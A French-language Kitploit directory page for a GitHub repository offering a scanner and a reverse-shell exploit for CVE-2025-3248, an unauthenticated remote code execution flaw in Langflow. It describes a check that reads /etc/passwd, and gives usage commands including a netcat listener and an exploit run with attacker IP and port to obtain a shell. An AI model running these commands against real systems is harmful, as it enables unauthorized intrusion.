Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3248 | Kitploit
Outils/GitHubGitHub/r0otk3r/cve-2025-3248
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3248 : Exécution de code à distance non authentifiée (RCE) dans Langflow

Ce dépôt contient deux scripts Python :

  • LangflowCheck.py : un scanner qui vérifie les instances Langflow AI vulnérables à la CVE-2025-3248.
  • exploit.py : un exploit de shell inversé fonctionnel pour les cibles Langflow vulnérables.

Résumé

CVE-2025-3248 est une vulnérabilité critique dans Langflow AI qui permet à des attaquants non authentifiés d'exécuter du code Python arbitraire à distance via une charge utile spécialement conçue envoyée à /api/v1/validate/code.


Fichiers

LangflowCheck.py

  • Vérifie si une cible est vulnérable en tentant d'exécuter une charge utile inoffensive qui lit /etc/passwd.
  • Peut analyser une seule cible ou une liste d'URL.
  • Prend en charge l'écriture des cibles vulnérables dans un fichier.

exploit.py

  • Envoie une charge utile de shell inversé à l'endpoint vulnérable.
  • Nécessite l'IP de l'attaquant (lhost) et le port d'écoute (lport).
  • Journalise l'activité dans exploit.log.
  • Prend en charge la vérification du listener avant l'envoi de la charge utile.

Utilisation

1. Installer les dépendances

root@kitploit:~
pip install -r requirements.txt

2. Lancer le scanner de vulnérabilités

URL unique

root@kitploit:~
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

1

Cibles multiples

root@kitploit:~
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

tt

3. Exploiter une cible

D'abord, démarrez un listener

root@kitploit:~
sudo nc -nvlp 4444

l

Ensuite, exécutez l'exploit :

root@kitploit:~
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

2

Vous devriez recevoir un shell si la cible est vulnérable. root

⚠️ Avertissement

Cet exploit est destiné uniquement à des tests de sécurité éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.


Chaînes officielles

  • YouTube @rootctf
  • X @r0otk3r
Télécharger l’outil